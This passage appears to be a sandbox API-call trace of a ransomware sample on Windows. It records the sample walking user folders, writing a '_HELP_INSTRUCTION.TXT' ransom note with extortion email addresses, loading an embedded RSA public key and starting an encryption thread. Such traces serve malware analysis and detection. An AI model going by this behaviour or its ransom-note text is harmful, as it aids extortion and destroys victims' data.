param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT") returned 48 [0136.041] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0136.041] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0136.041] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x744) returned 0x0 [0136.041] RegQueryValueExW (in: hKey=0x744, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d00740, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3d00740*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0136.041] RegCloseKey (hKey=0x744) returned 0x0 [0136.041] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0136.042] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0136.042] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.042] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.043] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0136.044] PathFindFileNameW (pszPath="C:\\Users\\Default\\Documents") returned="Documents" [0136.044] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0136.044] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0136.044] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0136.044] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.044] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0136.044] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.044] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.044] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0136.044] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0136.044] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0136.044] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0136.044] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0136.044] SetErrorMode (uMode=0x1) returned 0x1 [0136.044] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0136.044] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0136.044] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Music\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\") returned="C:\\Users\\Default\\Documents\\My Music\\" [0136.044] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*.*") returned="C:\\Users\\Default\\Documents\\My Music\\*.*" [0136.044] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0136.044] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0136.044] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Music" | out: lpString1="C:\\Users\\Default\\Documents\\My Music") returned="C:\\Users\\Default\\Documents\\My Music" [0136.044] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Music\\*.*") returned="C:\\Users\\Default\\Documents\\My Music\\*.*" [0136.044] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="Desktop") returned 0x0 [0136.045] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Music\\", lpSrch="DESKTOP") returned 0x0 [0136.045] SetErrorMode (uMode=0x1) returned 0x1 [0136.045] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 57 [0136.045] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0136.045] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0136.045] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x748) returned 0x0 [0136.045] RegQueryValueExW (in: hKey=0x748, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d00970, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3d00970*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0136.045] RegCloseKey (hKey=0x748) returned 0x0 [0136.045] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0136.045] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0136.045] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.046] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.046] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0136.046] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0136.046] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.046] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0136.046] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0136.046] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0136.046] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0136.046] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0136.046] SetErrorMode (uMode=0x1) returned 0x1 [0136.046] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0136.046] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0136.046] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\") returned="C:\\Users\\Default\\Documents\\My Pictures\\" [0136.046] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*.*" [0136.046] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0136.047] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0136.047] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures") returned="C:\\Users\\Default\\Documents\\My Pictures" [0136.047] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Default\\Documents\\My Pictures\\*.*" [0136.047] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="Desktop") returned 0x0 [0136.047] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Pictures\\", lpSrch="DESKTOP") returned 0x0 [0136.047] SetErrorMode (uMode=0x1) returned 0x1 [0136.047] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 60 [0136.047] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0136.047] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0136.047] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x748) returned 0x0 [0136.047] RegQueryValueExW (in: hKey=0x748, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d00ba0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3d00ba0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0136.047] RegCloseKey (hKey=0x748) returned 0x0 [0136.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0136.047] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0136.047] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.047] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.048] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0136.048] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0136.048] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.048] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0136.048] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0136.048] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Default\\Documents" | out: lpString1="C:\\Users\\Default\\Documents") returned="C:\\Users\\Default\\Documents" [0136.048] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\") returned="C:\\Users\\Default\\Documents\\" [0136.048] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0136.048] SetErrorMode (uMode=0x1) returned 0x1 [0136.048] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0136.048] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0136.048] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\") returned="C:\\Users\\Default\\Documents\\My Videos\\" [0136.048] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="C:\\Users\\Default\\Documents\\My Videos\\*.*" [0136.048] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0136.048] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0136.048] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Documents\\My Videos" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos") returned="C:\\Users\\Default\\Documents\\My Videos" [0136.048] lstrcatW (in: lpString1="C:\\Users\\Default\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Documents\\My Videos\\*.*") returned="C:\\Users\\Default\\Documents\\My Videos\\*.*" [0136.048] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="Desktop") returned 0x0 [0136.048] StrStrW (lpFirst="C:\\Users\\Default\\Documents\\My Videos\\", lpSrch="DESKTOP") returned 0x0 [0136.048] SetErrorMode (uMode=0x1) returned 0x1 [0136.048] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 58 [0136.048] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0136.049] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0136.049] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x748) returned 0x0 [0136.049] RegQueryValueExW (in: hKey=0x748, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3d00dd0, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3d00dd0*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0136.049] RegCloseKey (hKey=0x748) returned 0x0 [0136.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0136.049] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0136.049] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0136.049] CreateFileW (lpFileName="C:\\Users\\Default\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\default\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.049] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0136.049] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0136.049] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0136.050] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0136.050] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0136.050] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0136.050] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0136.050] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0136.050] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Default" | out: lpString1="C:\\Users\\Default") returned="C:\\Users\\Default" [0136.050] lstrcatW (in: lpString1="C:\\Users\\Default", lpString2="\\" | out: lpString1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0136.050] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0136.051] SetErrorMode (uMode=0x1) returned 0x1 [0136.051] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0136.051] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0136.051] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Default\\Downloads\\" | out: lpString1="C:\\Users\\Default\\Downloads\\") returned="C:\\Users\\Default\\Downloads\\" [0136.051] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\Default\\Downloads\\*.*") returned="C:\\Users\\Default\\Downloads\\*.*" [0136.051] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3a6290 [0136.051] PathFindFileNameW (pszPath="C:\\Users\\Default\\Downloads") returned="Downloads" [0136.051] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0136.051] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.051] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0136.051] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0136.051] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0136.051] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0136.051] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0136.051] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0136.051] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0136.051] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0136.051] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="Desktop") returned 0x0 [0136.051] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0136.051] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned 31 [0136.051] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0136.051] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0136.051] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned="\\\\?\\C:\\Users\\Default\\Downloads\\" [0136.051] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x74c [0136.052] Sleep (dwMilliseconds=0x96) [0136.193] FindNextFileW (in: hFindFile=0x3a6290, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0136.193] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 1 [0136.193] FindClose (in: hFindFile=0x3a6290 | out: hFindFile=0x3a6290) returned 0 [0136.194] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Default\\Downloads" | out: lpString1="C:\\Users\\Default\\Downloads") returned="C:\\Users\\Default\\Downloads" [0136.194] lstrcatW (in: lpString1="C:\\Users\\Default\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\Default\\Downloads\\*.*") returned="C:\\Users\\Default\\Downloads\\*.*" [0136.194] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="Desktop") returned 0x0 [0136.194] StrStrW (lpFirst="C:\\Users\\Default\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0136.194] 